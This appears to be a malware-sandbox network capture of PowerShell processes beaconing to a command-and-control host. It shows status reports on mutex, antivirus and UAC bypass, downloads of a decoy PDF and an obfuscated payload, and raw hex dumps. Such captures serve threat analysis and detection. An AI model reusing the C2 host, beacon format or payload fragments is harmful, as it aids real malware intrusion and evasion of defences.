                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b42a19dc7cee-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102391&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1034&delivery_rate=37359&cwnd=242&unsent_bytes=0&cid=ac3fd6ece1ef0536&ts=822&x=0"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.11.3049735172.67.137.624437944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:18 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321183b73b8235764f47dd55c3fa53226e74b HTTP/1.1
                                                                                                                          Content-Type: application/json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Content-Length: 86
                                                                                                                          2024-11-08 09:58:18 UTC86OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4d 75 74 65 78 20 69 73 20 6e 6f 74 20 6c 6f 63 6b 65 64 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 41 56 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                          Data Ascii: [ "\"Mutex is not locked\"", "\"AV Windows Defender\"", "----------"]
                                                                                                                          2024-11-08 09:58:19 UTC946INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:19 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2FFwMeg2NOp7AcfVduW3Dzbgo%2BIeGUSXVP5Qsvt5DucvF9Rh0lG42AkAH6M8qrMld5yiEQd6qHFEtR3J8WmfbAelSMq4zlbltEHlpdoC20vOt0Valk3E4V%2FV6RENrkIRx0zY0X%2Bjueaw"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9211&sent=14455&recv=7189&lost=0&retrans=11&sent_bytes=20423099&recv_bytes=56153&delivery_rate=31521853&cwnd=269&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b4311eab43d4-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102144&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1035&delivery_rate=37490&cwnd=251&unsent_bytes=0&cid=07b2af51e4555dec&ts=814&x=0"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.11.3049736172.67.137.624435892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:19 UTC394OUTGET /file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33a1ad49ca3cce39415efa5e154367a48c9b2235950ff73e0aa6e501ee70b1a57fd20e0e662cce5de5e764c8ea69e8f5460905e960f2da5e2d0f365f522005f31ce54fbcd4e6cc47d74d60a5e59c2a76ec HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-11-08 09:58:20 UTC1059INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:20 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 137244
                                                                                                                          Connection: close
                                                                                                                          content-disposition: attachment; filename=file; filename*=UTF-8''file
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5V4C0Heswhy4AIaOAOHJhrgvudg9Q9OMno335SF7SB0WBRQUV27zrfmLjxcxOH6R4Hb6kzUJtvY03HrQazACYmuH4lMD%2FdIwCMK6VXybULRPqpmDR%2BJGiuuS3BxHtnQfJp48nHT33E7"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=23349&sent=11259&recv=5623&lost=0&retrans=0&sent_bytes=15760021&recv_bytes=113716&delivery_rate=11633466&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b434efc67f56-IAD
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=109093&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1008&delivery_rate=35021&cwnd=253&unsent_bytes=0&cid=df888aef331c0f8b&ts=899&x=0"
                                                                                                                          2024-11-08 09:58:20 UTC310INData Raw: 25 50 44 46 2d 31 2e 35 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 33 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 72 6f 64 75 63 65 72 20 28 53 6b 69 61 2f 50 44 46 20 6d 39 31 29 0a 2f 72 67 69 64 20 28 50 42 3a 33 35 30 30 37 34 33 38 38 5f 41 53 3a 31 30 30 31 36 37 33 36 37 33 36 38 37 30 34 31 40 31 36 31 35 38 32 39 30 32 32 37 39 38 29 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 43 6f 75 6e 74 20 34 0a 2f 4b 69 64 73 20 5b 34 20 30 20 52 20 35 20 30 20 52 20 36 20 30 20 52 20 37 20 30 20 52 5d 0a 2f 54 79 70 65 20 2f 50 61 67 65 73 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70
                                                                                                                          Data Ascii: %PDF-1.5%1 0 obj<</Pages 2 0 R/Type /Catalog>>endobj3 0 obj<</Producer (Skia/PDF m91)/rgid (PB:350074388_AS:1001673673687041@1615829022798)>>endobj2 0 obj<</Count 4/Kids [4 0 R 5 0 R 6 0 R 7 0 R]/Type /Pages>>endobj4 0 obj<</Typ
                                                                                                                          2024-11-08 09:58:20 UTC1369INData Raw: 67 65 43 20 2f 49 6d 61 67 65 49 5d 0a 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 0a 2f 47 33 20 38 20 30 20 52 0a 2f 47 38 20 39 20 30 20 52 0a 2f 47 39 20 31 30 20 30 20 52 0a 3e 3e 0a 2f 58 4f 62 6a 65 63 74 20 3c 3c 0a 2f 58 37 20 31 31 20 30 20 52 0a 3e 3e 0a 2f 46 6f 6e 74 20 3c 3c 0a 2f 46 34 20 31 32 20 30 20 52 0a 2f 46 35 20 31 33 20 30 20 52 0a 2f 46 36 20 31 34 20 30 20 52 0a 3e 3e 0a 3e 3e 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 30 20 30 20 35 39 35 2e 39 31 39 39 38 20 38 34 31 2e 39 31 39 39 38 5d 0a 2f 41 6e 6e 6f 74 73 20 5b 31 35 20 30 20 52 20 31 36 20 30 20 52 20 31 37 20 30 20 52 20 31 38 20 30 20 52 20 31 39 20 30 20 52 20 32 30 20 30 20 52 20 32 31 20 30 20 52 5d 0a 2f 43 6f 6e 74 65 6e 74 73 20 32 32 20 30 20 52 0a 2f 53 74 72 75 63 74 50
                                                                                                                          Data Ascii: geC /ImageI]/ExtGState <</G3 8 0 R/G8 9 0 R/G9 10 0 R>>/XObject <</X7 11 0 R>>/Font <</F4 12 0 R/F5 13 0 R/F6 14 0 R>>>>/MediaBox [0 0 595.91998 841.91998]/Annots [15 0 R 16 0 R 17 0 R 18 0 R 19 0 R 20 0 R 21 0 R]/Contents 22 0 R/StructP
                                                                                                                          2024-11-08 09:58:20 UTC1369INData Raw: 6a 65 63 74 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0a 2f 57 69 64 74 68 20 36 34 0a 2f 48 65 69 67 68 74 20 36 34 0a 2f 43 6f 6c 6f 72 53 70 61 63 65 20 2f 44 65 76 69 63 65 52 47 42 0a 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 0a 2f 46 69 6c 74 65 72 20 2f 44 43 54 44 65 63 6f 64 65 0a 2f 43 6f 6c 6f 72 54 72 61 6e 73 66 6f 72 6d 20 30 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e
                                                                                                                          Data Ascii: ject/Subtype /Image/Width 64/Height 64/ColorSpace /DeviceRGB/BitsPerComponent 8/Filter /DCTDecode/ColorTransform 0>>streamJFIFC!"$"$C
                                                                                                                          2024-11-08 09:58:20 UTC1369INData Raw: c3 3d 4c 6e 16 09 e5 89 58 72 15 bd 31 4b 89 d0 57 b4 b6 b9 5c d6 40 dd c4 8f e1 4b 33 2b a8 63 dc 8e b8 52 ca d4 54 51 d3 b0 99 3d 45 ab d3 2f 9d 68 32 5a 87 8e a9 a4 f2 de aa 33 61 11 e6 e1 48 ea dc 7d 07 d7 1b 1a 7e 9e c4 8a 8f b0 9e 65 e2 ff 00 1a 51 44 6b 3b 4c 33 f0 49 00 81 db 3c 9f a0 ef 18 5e 11 f8 bd 1c 50 d3 e9 fd 5d 5b 53 34 cf 30 8e 9b 31 96 cc 36 9e 02 ca dd 7e f7 01 bd ec 7b e3 aa b6 a9 d1 f0 b1 ed 3c 86 bd 5f 34 f5 63 07 d7 1e be f8 8f 45 60 11 fb da d8 b2 79 90 88 97 fb 44 e7 91 d2 e9 aa 7c 84 4a 04 b9 84 ca 64 1d 6d 1a 9e 2e 3b 16 b7 fa 4e 23 b8 7d ba 62 02 22 32 d5 fe dc a9 80 ef 2b 01 01 4b 37 3b ac a5 81 ef 63 7c 52 5e 61 82 f2 c6 a7 a8 a3 ab 8e 70 1b 7d 74 92 6e 3c f1 d3 fa 8c 34 71 14 64 f8 5f 9c c1 51 1b e4 f5 12 a9 aa a6 5b 44 18
                                                                                                                          Data Ascii: =LnXr1KW\@K3+cRTQ=E/h2Z3aH}~eQDk;L3I<^P][S4016~{<_4cE`yD|Jdm.;N#}b"2+K7;c|R^ap}tn<4qd_Q[D
                                                                                                                          2024-11-08 09:58:20 UTC517INData Raw: 74 79 70 65 20 2f 4c 69 6e 6b 0a 2f 46 20 34 0a 2f 42 6f 72 64 65 72 20 5b 30 20 30 20 30 5d 0a 2f 52 65 63 74 20 5b 32 30 30 2e 38 37 36 35 31 20 37 36 32 2e 33 36 34 39 33 20 33 33 35 2e 34 35 37 31 35 20 37 37 30 2e 33 32 30 34 33 5d 0a 2f 41 20 3c 3c 0a 2f 54 79 70 65 20 2f 41 63 74 69 6f 6e 0a 2f 53 20 2f 55 52 49 0a 2f 55 52 49 20 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 73 65 61 72 63 68 67 61 74 65 2e 6e 65 74 2f 70 75 62 6c 69 63 61 74 69 6f 6e 2f 33 35 30 30 37 34 33 38 38 5f 4d 45 44 49 41 5f 42 55 59 49 4e 47 5f 46 4f 52 5f 44 49 47 49 54 41 4c 5f 4d 41 52 4b 45 54 49 4e 47 3f 65 6e 72 69 63 68 49 64 3d 72 67 72 65 71 2d 34 35 65 38 61 38 32 64 39 33 63 37 62 65 65 30 66 63 31 32 38 66 66 34 30 35 66 61 64 30 30 33 2d 58 58 58 26 65 6e 72
                                                                                                                          Data Ascii: type /Link/F 4/Border [0 0 0]/Rect [200.87651 762.36493 335.45715 770.32043]/A <</Type /Action/S /URI/URI (https://www.researchgate.net/publication/350074388_MEDIA_BUYING_FOR_DIGITAL_MARKETING?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enr
                                                                                                                          2024-11-08 09:58:20 UTC1369INData Raw: 53 20 2f 55 52 49 0a 2f 55 52 49 20 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 73 65 61 72 63 68 67 61 74 65 2e 6e 65 74 2f 70 75 62 6c 69 63 61 74 69 6f 6e 2f 33 35 30 30 37 34 33 38 38 5f 4d 45 44 49 41 5f 42 55 59 49 4e 47 5f 46 4f 52 5f 44 49 47 49 54 41 4c 5f 4d 41 52 4b 45 54 49 4e 47 3f 65 6e 72 69 63 68 49 64 3d 72 67 72 65 71 2d 34 35 65 38 61 38 32 64 39 33 63 37 62 65 65 30 66 63 31 32 38 66 66 34 30 35 66 61 64 30 30 33 2d 58 58 58 26 65 6e 72 69 63 68 53 6f 75 72 63 65 3d 59 32 39 32 5a 58 4a 51 59 57 64 6c 4f 7a 4d 31 4d 44 41 33 4e 44 4d 34 4f 44 74 42 55 7a 6f 78 4d 44 41 78 4e 6a 63 7a 4e 6a 63 7a 4e 6a 67 33 4d 44 51 78 51 44 45 32 4d 54 55 34 4d 6a 6b 77 4d 6a 49 33 4f 54 67 25 33 44 26 65 6c 3d 31 5f 78 5f 33 26 5f 65 73 63 3d 70 75
                                                                                                                          Data Ascii: S /URI/URI (https://www.researchgate.net/publication/350074388_MEDIA_BUYING_FOR_DIGITAL_MARKETING?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_3&_esc=pu
                                                                                                                          2024-11-08 09:58:20 UTC1369INData Raw: 5f 65 73 63 3d 70 75 62 6c 69 63 61 74 69 6f 6e 43 6f 76 65 72 50 64 66 29 0a 3e 3e 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 30 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 41 6e 6e 6f 74 0a 2f 53 75 62 74 79 70 65 20 2f 4c 69 6e 6b 0a 2f 46 20 34 0a 2f 42 6f 72 64 65 72 20 5b 30 20 30 20 30 5d 0a 2f 52 65 63 74 20 5b 36 36 2e 32 39 35 38 38 33 20 35 37 39 2e 33 38 38 33 31 20 31 30 39 2e 33 38 38 31 39 39 20 35 39 33 2e 33 31 30 34 32 5d 0a 2f 41 20 3c 3c 0a 2f 54 79 70 65 20 2f 41 63 74 69 6f 6e 0a 2f 53 20 2f 55 52 49 0a 2f 55 52 49 20 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 73 65 61 72 63 68 67 61 74 65 2e 6e 65 74 2f 70 72 6f 66 69 6c 65 2f 4b 65 72 65 6e 2d 4f 62 61 72 61 3f 65 6e 72 69 63 68 49 64 3d 72 67 72 65 71 2d 34 35 65 38 61 38 32 64
                                                                                                                          Data Ascii: _esc=publicationCoverPdf)>>>>endobj20 0 obj<</Type /Annot/Subtype /Link/F 4/Border [0 0 0]/Rect [66.295883 579.38831 109.388199 593.31042]/A <</Type /Action/S /URI/URI (https://www.researchgate.net/profile/Keren-Obara?enrichId=rgreq-45e8a82d
                                                                                                                          2024-11-08 09:58:20 UTC1369INData Raw: 96 56 42 3e c0 12 28 12 7e e8 3a 61 48 82 a9 aa c6 e6 1f 14 cf 98 7f fa 64 7f c3 f0 39 e1 57 ed 7e 3d fb c9 da 76 ed 27 fd ac 7f 97 31 8a b6 4f 3f e9 78 b9 fb 7e b7 80 46 da 3d ff ff 14 d0 77 e0 5a 5a 7b c6 77 4b c3 bc 6c 69 a9 a9 f6 2d aa 8a 91 89 9b 99 a2 0f 4f fd 57 d4 c0 fe 3d d2 ff a6 f3 d1 af 99 e2 e8 d5 8d 41 05 ec df eb 7f 49 12 27 90 29 5d 20 0c 4c f8 3b 81 64 e3 d8 8d 9d fc 6f 5b 13 b2 81 c7 bb 45 41 37 6d 51 43 69 98 55 ee 62 80 d8 a7 9b a5 4a da 5b b9 40 5b 07 e7 69 0f 92 11 f9 4f c8 0c d6 9e de cd a1 55 9b c3 99 ef 9f 20 e0 7d 1d e2 47 f6 42 44 00 3e 29 97 44 a0 c6 9f 3b 27 e9 ef 4c ca ac 7e 6c 76 fd d3 5f 51 a8 60 f9 f6 da bf ee 48 e2 cf 6b d8 7f c4 3f 70 d8 40 af 99 0b 7a cd 70 e6 b1 15 f0 24 cd 01 0f 1f 6b 79 02 6b 3d d5 99 9c 8f 47 f3 9a
                                                                                                                          Data Ascii: VB>(~:aHd9W~=v'1O?x~F=wZZ{wKli-OW=AI')] L;do[EA7mQCiUbJ[@[iOU }GBD>)D;'L~lv_Q`Hk?p@zp$kyk=G
                                                                                                                          2024-11-08 09:58:20 UTC1369INData Raw: 3c 1f 43 7d b0 6d a8 0f 74 0c f5 59 ec e1 e4 47 4c a7 30 a0 ad c9 d7 36 d4 6e 1a 6a 78 0e 2f 9c f1 45 87 49 4c cc dd 50 93 b3 62 43 6e 8d 63 40 1a 43 df d1 9c b5 76 e0 b6 d8 77 6c 0a 69 11 52 b4 ee ac 34 87 18 d1 1b f2 97 f7 cb a0 dd 8e 18 cb e8 7b 93 74 84 81 a3 e5 3b 1c c1 49 e6 45 27 a7 8a 10 82 41 32 16 0a ae 3d 80 19 42 80 42 10 55 3b f0 eb 0d 96 e0 31 b2 e8 14 e7 9d e2 11 76 29 50 05 ee 3a 19 73 78 ef 4b 22 e5 9c 84 2a 2e 33 44 ee ac 5c ae 1c a6 b5 b2 3a 38 30 4c f4 6c 16 7e 63 38 51 5a 0f 23 55 53 41 96 c0 5c 1c a8 43 18 73 99 b1 77 b0 99 53 f6 17 b9 a8 2c 6a 64 e2 e9 c0 9d 54 be 3c 1c 0c 2f 50 6c 79 a4 8a c5 de 1c 18 26 bb d1 bc 14 55 00 24 ec 14 38 f5 06 f8 2b 95 2b 58 4e d2 44 d8 40 57 f8 89 d5 43 d5 00 4f 12 56 e2 49 43 48 f4 32 44 04 62 2c db
                                                                                                                          Data Ascii: <C}mtYGL06njx/EILPbCnc@CvwliR4{t;IE'A2=BBU;1v)P:sxK"*.3D\:80Ll~c8QZ#USA\CswS,jdT</Ply&U$8++XND@WCOVICH2Db,
                                                                                                                          2024-11-08 09:58:20 UTC1369INData Raw: 51 ad 38 80 1b 89 55 f6 58 4e 1b c4 1b 16 12 c4 6d 7e 36 06 0b 54 87 6e 40 2e c8 6f 2f 24 89 e0 20 8f 6b 7b 43 46 9c 1e 79 91 a9 8e 42 5f e6 da 95 20 d2 3f 35 97 92 ba 4f d0 90 8b 8e 56 6b 28 d5 64 c4 36 35 17 48 7e 26 f1 22 30 1f 6b ab 8e 10 77 9f c6 56 46 41 b8 45 b9 b6 cf d8 19 32 77 6e 44 5a 4c 29 ac 69 dc 95 db 7b 43 dc 8f 65 31 7c 23 5c 3a df bd f1 8d a2 a9 22 f0 b0 b6 8f 14 42 d3 a9 3c 33 20 8b 44 2b b1 18 61 6e 1d b9 eb 10 3d 67 aa 90 0b 6e 14 dc c2 ae 84 b8 65 f4 74 f3 bc 08 21 98 5b f9 1d 67 06 32 ea 68 5d 71 24 35 4b ef 6f b5 11 87 da be 1a 73 8f 71 4b 43 13 7c 7b 14 8d 77 06 b5 73 01 e3 d6 0a 3e 99 b1 aa 2b 89 24 c6 70 2b 03 da 15 11 87 ba 82 08 47 a1 92 38 11 6e 52 22 59 a5 90 7d eb ea 20 0b b3 22 88 cc b4 b9 02 c8 02 5c f1 c3 20 57 f8 e0 9a
                                                                                                                          Data Ascii: Q8UXNm~6Tn@.o/$ k{CFyB_ ?5OVk(d65H~&"0kwVFAE2wnDZL)i{Ce1|#\:"B<3 D+an=gnet![g2h]q$5KosqKC|{ws>+$p+G8nR"Y} "\ W


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.11.3049737172.67.137.624437944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:19 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321183b73b8235764f47dd55c3fa53226e74b HTTP/1.1
                                                                                                                          Content-Type: application/json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Content-Length: 62
                                                                                                                          2024-11-08 09:58:19 UTC62OUTData Raw: 5b 0d 0a 20 20 20 20 22 30 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 6f 20 63 61 6e 20 62 79 70 61 73 73 20 75 61 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                          Data Ascii: [ "0", "\"ko can bypass uac\"", "----------"]
                                                                                                                          2024-11-08 09:58:20 UTC947INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:20 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2BjSpFjCw1vFB7yMkzXqn48%2FxbqIEFe2n%2Bhos7Czmqz9qNBHA930OvkuxikL01J3kyawQVe2enbGWnAIlX1hxwIJTokZd8Yx5TNFGZ1blCMhv%2Bynggngc6rUcIidXmhuyDOi3XR8cgkV"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=21163&sent=14461&recv=7195&lost=0&retrans=11&sent_bytes=20424600&recv_bytes=57949&delivery_rate=31521853&cwnd=271&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b437bb574343-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102101&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1011&delivery_rate=37467&cwnd=249&unsent_bytes=0&cid=dce5a580ce8f8567&ts=813&x=0"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.11.3049738172.67.137.624434780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:24 UTC394OUTGET /file2/67f0828de55a7b0ae4143def41be5826e35728fe516a68fd7776f4f474689bc6ab22273c73b70a1db6a1d1a5a722db57826cdbaf9bb1da919ab6b53967c4bf044fb82b81afdbf15569d5eccde03bc8c4a7a71498eb1d6b80d2600766aa798119e9744ccb9a12497618e8c21987262036 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-11-08 09:58:24 UTC1064INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:24 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 12154
                                                                                                                          Connection: close
                                                                                                                          content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hY9KDYaQwQZjT%2ByL8dbWuqw%2F1xAuD6kLS4nFrm%2Fv0nEcfQTkDXtvA2%2FmlDXpNy2oqbblNyio8FnwJWLhv06vs4QuVZFT6smk7kFOOOjrIKxakJZtMJvyU6FfvFaHiPQe3Pao6tyMaH4z"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=29946&sent=14472&recv=7209&lost=0&retrans=11&sent_bytes=20428390&recv_bytes=68444&delivery_rate=31521853&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b4516bd20c8e-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102033&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1008&delivery_rate=37471&cwnd=252&unsent_bytes=0&cid=f078fcc85b55aa59&ts=837&x=0"
                                                                                                                          2024-11-08 09:58:24 UTC305INData Raw: 25 79 67 62 60 72 68 77 70 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 34 50 6a 4b 6b 52 44 4b 7b 5b 57 4f 42 56 57 50 79 52 56 65 60 57 7b 57 70 58 33 34 72 65 33 53 49 63 49 5b 68 60 55 6d 73 56 6d 65 4e 64 56 57 58 50 6b 43 69 57 7b 6d 30 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 65 60 65 6c 4f 71 50 56 38 4a 53 33 75 6f 54 47 4f 43 65 31 38 34 50 56 75 69 54 31 47 31 58 6a 69 53 5b 31 71 49 56 6f 43 68 53 30 5b 45 5b 57 69 52 63 46 4f 34 4f 54 30 60 57 7b 57 74 5b 44 65 6f 4f 31 6d 45 54 6f 43 4d 64
                                                                                                                          Data Ascii: %ygb`rhwp<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#UjOqPVeKP1GoRTOC[1m4PjKkRDK{[WOBVWPyRVe`W{WpX34re3SIcI[h`UmsVmeNdVWXPkCiW{m0SGGw[1mEPVeKP1GoRTe`elOqPV8JS3uoTGOCe184PVuiT1G1XjiS[1qIVoChS0[E[WiRcFO4OT0`W{Wt[DeoO1mEToCMd
                                                                                                                          2024-11-08 09:58:24 UTC1369INData Raw: 68 52 6a 65 72 5b 44 6d 44 4c 46 65 4a 53 30 71 76 58 6a 65 56 50 33 57 58 54 6c 79 6b 4c 59 4f 73 58 57 58 76 5b 31 79 59 52 6b 53 68 4c 31 6d 6f 52 6a 5b 6e 65 6c 4f 73 65 46 79 6d 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 34 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 34 50 6d 69 6b 63 56 76 76 56 6d 4f 42 4c 46 47 49 57 56 65 60 57 7b 57 70 58 33 34 72 65 33 53 49 57 6c 75 4c 4c 6d 4b 72 56 55 4f 4a 4f 56 4f 48 54 6c 79 60 50 31 4b 71 5b 57 69 52 63 46 4f 34 50 6b 43 68 64 54 48 76 58 54 65 57 5b 33 48 7b 57 6b 43 6b 52 47 58 76 52 54 65 60 62 46 4b 49 57 54 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 59 4c 54 35 30 58 7b 4f 52 63 46 4b 55 4f 54 71 54 64 55 57 49 58 57 65 35 63 47 69 54 63 7b 5b 56 4c 31
                                                                                                                          Data Ascii: hRjer[DmDLFeJS0qvXjeVP3WXTlykLYOsXWXv[1yYRkShL1moRj[nelOseFymTUCMRTOC[1mEPVeKP1H4SGGwUjOqPVeKP1GoRTOC[1m4PmikcVvvVmOBLFGIWVe`W{WpX34re3SIWluLLmKrVUOJOVOHTly`P1Kq[WiRcFO4PkChdTHvXTeW[3H{WkCkRGXvRTe`bFKIWT4E`TGoRTOC[1mEPVeYLT50X{ORcFKUOTqTdUWIXWe5cGiTc{[VL1
